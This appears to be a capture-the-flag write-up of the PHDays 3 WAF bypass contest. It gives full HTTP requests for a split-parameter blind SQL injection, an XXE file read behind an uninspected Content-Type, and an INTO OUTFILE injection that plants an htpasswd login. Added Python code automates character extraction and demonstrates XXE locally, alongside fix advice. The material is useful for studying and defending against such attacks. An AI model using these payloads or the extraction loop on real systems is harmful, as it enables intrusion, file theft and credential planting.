Untitled
a guest
May 28th, 2013
= PHDays 3 WAF bypass contest
== Stage 1.
Blind SQLi. The backend concatenates every <search_name> parameter, so the payload can be split across many parameters with the same name: each one carries only a couple of characters (or a newline), so no single value contains a keyword such as "select" or "ord(" for the WAF to match, while the reassembled string is the full query. Note that > has to be sent as &gt; inside the XML:
POST /api/ HTTP/1.1
Host: 62.148.7.178
Content-Length: 1985
Referer: http://62.148.7.178/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: *
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0

<?xml version="1.0"?><request><search_name>
</search_name><search_name>Kn</search_name><search_name>ig</search_name><search_name>ht</search_name><search_name>
'</search_name><search_name>
a</search_name><search_name>nd</search_name><search_name>
(</search_name><search_name>or</search_name><search_name>d(</search_name><search_name>su</search_name><search_name>bs</search_name><search_name>tr</search_name><search_name>in</search_name><search_name>g(</search_name><search_name>(s</search_name><search_name>el</search_name><search_name>ec</search_name><search_name>t
</search_name><search_name>fl</search_name><search_name>ag</search_name><search_name>
f</search_name><search_name>ro</search_name><search_name>m
</search_name><search_name>se</search_name><search_name>cr</search_name><search_name>et</search_name><search_name>_t</search_name><search_name>bl</search_name><search_name>
w</search_name><search_name>he</search_name><search_name>re</search_name><search_name>
f</search_name><search_name>la</search_name><search_name>g
</search_name><search_name>=
</search_name><search_name>'3</search_name><search_name>06</search_name><search_name>6d</search_name><search_name>7f</search_name><search_name>69</search_name><search_name>d7</search_name><search_name>98</search_name><search_name>70</search_name><search_name>06</search_name><search_name>8f</search_name><search_name>ae</search_name><search_name>85</search_name><search_name>21</search_name><search_name>c0</search_name><search_name>61</search_name><search_name>4b</search_name><search_name>2'</search_name><search_name>
l</search_name><search_name>im</search_name><search_name>it</search_name><search_name>
0</search_name><search_name>,1</search_name><search_name>),</search_name><search_name>1,</search_name><search_name>1)</search_name><search_name>)&gt;</search_name><search_name>
4</search_name><search_name>9 </search_name><search_name>)
</search_name><search_name>--</search_name><search_name>
a</search_name></request>

Flag #1 (MySQL, database test, table secret_tbl, column flag):
3066d7f69d79870068fae8521c0614b2
The second column of secret_tbl contains the string /var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag, which is the file read in the next stage.
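The same split-parameter trick generalized into a working extraction loop, as an added example that is not part of the original writeup. It assumes a backend shaped like the contest's (every <search_name> value is joined and pasted into a name = '...' query, and "found / not found" is the only feedback), plus a toy signature WAF that checks each parameter value on its own; MySQL's ord() and substring() are shimmed onto SQLite so it runs offline. The table and column names and the flag value are the page's; the users table, the Knight row, the query shape and the WAF signatures are assumptions.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Flag #1 value from the writeup, planted here as the secret to extract.
FLAG = "3066d7f69d79870068fae8521c0614b2"

# ---- toy target: the contest's MySQL query shape, run on SQLite (assumed backend) ----

def make_db():
    conn = sqlite3.connect(":memory:")
    # Shim MySQL's ORD() and SUBSTRING(s, pos, len) so the contest query runs unchanged.
    conn.create_function("ord", 1, lambda s: ord(s[0]) if s else 0)
    conn.create_function("substring", 3,
                         lambda s, pos, n: (s or "")[pos - 1:pos - 1 + n])
    conn.execute("create table users(name text)")
    conn.execute("insert into users values ('Knight')")       # assumed searchable row
    conn.execute("create table secret_tbl(flag text, path text)")
    conn.execute("insert into secret_tbl values (?, ?)",
                 (FLAG, "/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag"))
    return conn

def params(body):
    """All <search_name> values, in document order."""
    return [e.text or "" for e in ET.fromstring(body).iter("search_name")]

# Toy signature WAF (assumption): inspects every parameter value separately.
SIGNATURES = re.compile(r"select|union|from|where|substring|ord\(", re.I)

def waf_blocks(body):
    return any(SIGNATURES.search(v) for v in params(body))

def backend_found(conn, body):
    """Vulnerable handler: joins same-name params, then string-formats them into SQL."""
    name = "".join(params(body))
    sql = "select name from users where name = '%s'" % name
    return len(conn.execute(sql).fetchall()) > 0

# ---- attacker side ----

def fragment(sql, chunk=2):
    """Emit the injection as consecutive <search_name> elements of `chunk` chars each."""
    pieces = [sql[i:i + chunk] for i in range(0, len(sql), chunk)]
    return ('<?xml version="1.0"?><request>'
            + "".join("<search_name>%s</search_name>" % escape(p) for p in pieces)
            + "</request>")

def probe_sql(pos, guess):
    # Same shape as the contest payload: the row matches iff ord(flag[pos]) > guess.
    return ("Knight' and (ord(substring((select flag from secret_tbl limit 0,1),%d,1))>%d) -- a"
            % (pos, guess))

def extract(send, max_len=64):
    """Binary-search each character through the boolean oracle send(body) -> bool."""
    out = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if send(fragment(probe_sql(pos, mid))):   # is the character > mid?
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:           # ord('') == 0 once we run past the end of the flag
            break
        out.append(chr(lo))
    return "".join(out)

def run_demo():
    conn = make_db()
    def send(body):
        if waf_blocks(body):
            raise RuntimeError("blocked by WAF")
        return backend_found(conn, body)
    return extract(send)

if __name__ == "__main__":
    print(run_demo())
```

Each position costs at most seven requests with the binary search; the contest payload is the pos=1, guess=49 instance of probe_sql(). The fix belongs in the backend, not the WAF: bind the search term as a query parameter and reject or collapse repeated parameters, so that keyword matching on individual values is never what stands between the attacker and the database.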
== Flag 2
Note the Content-Type trick that turned the WAF off: the body is declared as multipart/whatever with charset=EUC-JP, a type the WAF did not inspect, while the application still parsed it as XML and resolved the external entity (XXE), returning the file at the path found in stage 1:
POST /api/ HTTP/1.1
Host: 62.148.7.178
Content-Length: 176
Referer: http://62.148.7.178/
Content-Type: multipart/whatever; charset=EUC-JP
Accept-Encoding: *
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0

<?xml version="1.0" standalone="no"?><!DOCTYPE x [<!ENTITY e SYSTEM
'/var/lib/sepolgen/1241232eerwqwa/asfgasddddd11111/flag'>]><request><search_name>&e;</search_name></request>
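What the flag-2 payload does to a parser that resolves external entities, as an added example that is not from the writeup: it plants a constructed flag file, feeds the same request body to Python's stdlib SAX/expat reader with external general entities enabled (the assumed vulnerable configuration) and disabled (the stdlib default since Python 3.7.1), and returns what each parser hands the application as the search name. The handler class is an assumption about the application's shape; the file path is filled in at run time.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Same document shape as the flag-2 request; %s is replaced with the file to read.
XXE_BODY = ('<?xml version="1.0" standalone="no"?>'
            "<!DOCTYPE x [<!ENTITY e SYSTEM '%s'>]>"
            "<request><search_name>&e;</search_name></request>")

class SearchName(ContentHandler):
    """Collects the text of <search_name>, like a handler that echoes the search term."""
    def __init__(self):
        super().__init__()
        self.value, self._inside = "", False
    def startElement(self, name, attrs):
        self._inside = name == "search_name"
    def endElement(self, name):
        self._inside = False
    def characters(self, data):
        if self._inside:
            self.value += data

def search_name_from(body, resolve_external):
    """Parse with the stdlib SAX reader; resolve_external toggles external general entities."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)  # False is the stdlib default
    handler = SearchName()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(body))
    return handler.value

def demo(secret="c0ffee0123456789"):
    """Plant a constructed flag file, then parse the XXE body with both parser settings."""
    with tempfile.NamedTemporaryFile("w", suffix="_flag", delete=False) as f:
        f.write(secret)
        path = f.name
    try:
        body = (XXE_BODY % path).encode()
        leaked = search_name_from(body, resolve_external=True)    # vulnerable: file content
        blocked = search_name_from(body, resolve_external=False)  # entity left unresolved
        return leaked, blocked
    finally:
        os.unlink(path)

if __name__ == "__main__":
    leaked, blocked = demo()
    print("entities resolved:", repr(leaked))
    print("entities disabled:", repr(blocked))
```

The WAF bypass only mattered because the parser behind it was willing to fetch SYSTEM entities; with that feature off the same body yields an empty search name, and rejecting any document that carries a DOCTYPE at all is the stricter option.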
== Flag 3
494bf6673d0f0b8fafac5b637de9a70d
Write an htpasswd file via SQLi (UNION SELECT ... INTO OUTFILE; the written line is a crypt-format htpasswd entry for user admin), log in with those credentials, grab the flag. INTO OUTFILE only works when the MySQL account has the FILE privilege, secure_file_priv does not exclude the target directory, and the path is writable by the mysqld process; the same unrecognized Content-Type trick keeps the WAF out of the way:
POST /api/ HTTP/1.1
Host: 62.148.7.178
Content-Length: 172
Referer: http://62.148.7.178/
Content-Type: asdsadsa; charset=EUC-JP
Accept-Encoding: *
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:21.0) Gecko/20100101 Firefox/21.0

<?xml version="1.0" standalone="no"?><request><search_name>asd' UNION
select 'admin:XfOn8YD6hQ.NU' into outfile
'/var/www/thirdstage/winnerpwd' -- a</search_name></request>